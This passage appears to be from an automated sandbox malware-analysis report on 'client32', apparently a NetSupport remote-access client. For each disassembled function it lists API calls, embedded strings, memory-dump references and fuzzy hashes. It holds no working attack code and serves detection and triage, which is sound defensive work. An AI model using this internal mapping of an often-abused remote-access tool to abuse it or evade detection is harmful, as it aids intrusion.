                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                                                                                                    • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                                                                                    • API String ID: 3210887762-597690070
                                                                                                                                                    • Opcode ID: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                                                                                                    • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                                                                                                    • Opcode Fuzzy Hash: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                                                                                                    • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                                                                                                    Function 11053590 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 162COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EE294,1EF76653,?,?,?,?,00000000,11181BDE), ref: 110535C4
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 11053635
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11053660
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                                                                                      • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                                                                                                    • API String ID: 2238969640-1197860701
                                                                                                                                                    • Opcode ID: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                                                                                                    • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                                                                                                    • Opcode Fuzzy Hash: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                                                                                                    • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
                                                                                                                                                    Function 110654E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 80COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,776CC3F0,00000000), ref: 11065525
                                                                                                                                                      • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
                                                                                                                                                      • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0
                                                                                                                                                    • GetDC.USER32(00000000), ref: 11065558
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110655B9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDevice_strtok$Release__wcstoi64
                                                                                                                                                    • String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
                                                                                                                                                    • API String ID: 3945178471-2526036698
                                                                                                                                                    • Opcode ID: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                                                                                    • Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
                                                                                                                                                    • Opcode Fuzzy Hash: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                                                                                    • Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
                                                                                                                                                    Function 1101F2A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 70windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                                                                                                    • _memset.LIBCMT ref: 1101F2D8
                                                                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
                                                                                                                                                    • _free.LIBCMT ref: 1101F305
                                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                    • _free.LIBCMT ref: 1101F30E
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                                                                                                    • String ID: $0$UndoOwnerDraw
                                                                                                                                                    • API String ID: 4094458939-790594647
                                                                                                                                                    • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                                                                                    • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                                                                                                    • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                                                                                    • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                                                                                                    Function 1106F400 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wsprintfA.USER32 ref: 1106F737
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$EnterLeavewsprintf
                                                                                                                                                    • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                                                                                    • API String ID: 3005300677-3496508882
                                                                                                                                                    • Opcode ID: b470564540ec67704f5c8bb6b18a5cda2ad223c2dcf1e5bacda87c2cf28e558c
                                                                                                                                                    • Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
                                                                                                                                                    • Opcode Fuzzy Hash: b470564540ec67704f5c8bb6b18a5cda2ad223c2dcf1e5bacda87c2cf28e558c
                                                                                                                                                    • Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62
                                                                                                                                                    Function 11041440 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 211windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 1104147B
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • SendMessageTimeoutA.USER32(?,0000004A,000A0036,?,00000002,00002710,?), ref: 11041670
                                                                                                                                                    • _free.LIBCMT ref: 11041677
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                                                                                    • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                    • API String ID: 1897251511-2352888828
                                                                                                                                                    • Opcode ID: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                                                                                    • Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
                                                                                                                                                    • Opcode Fuzzy Hash: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                                                                                    • Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
                                                                                                                                                    Function 11051360 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 167COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 110513F9
                                                                                                                                                    • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle__wcstoi64_memset
                                                                                                                                                    • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                                                                                    • API String ID: 510078033-311296318
                                                                                                                                                    • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                                                                                    • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                                                                                                    • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                                                                                    • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                                                                                                    Function 11029520 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 131COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick
                                                                                                                                                    • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                                                                                                    • API String ID: 536389180-1339850372
                                                                                                                                                    • Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                                                                                    • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                                                                                                    • Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                                                                                    • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                                                                                                    Function 111076E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 123COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF
                                                                                                                                                    • Warning. took %d ms to get simap lock, xrefs: 1110773D
                                                                                                                                                    • Warning. simap lock held for %d ms, xrefs: 11107825
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick$CriticalSection$EnterLeave_strncpy
                                                                                                                                                    • String ID: SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                    • API String ID: 3891031082-3311166593
                                                                                                                                                    • Opcode ID: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                                                                                    • Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
                                                                                                                                                    • Opcode Fuzzy Hash: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                                                                                    • Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90
                                                                                                                                                    Function 110DD6D0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 110DD7B8
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110DD7D3
                                                                                                                                                    • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
                                                                                                                                                    • OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875
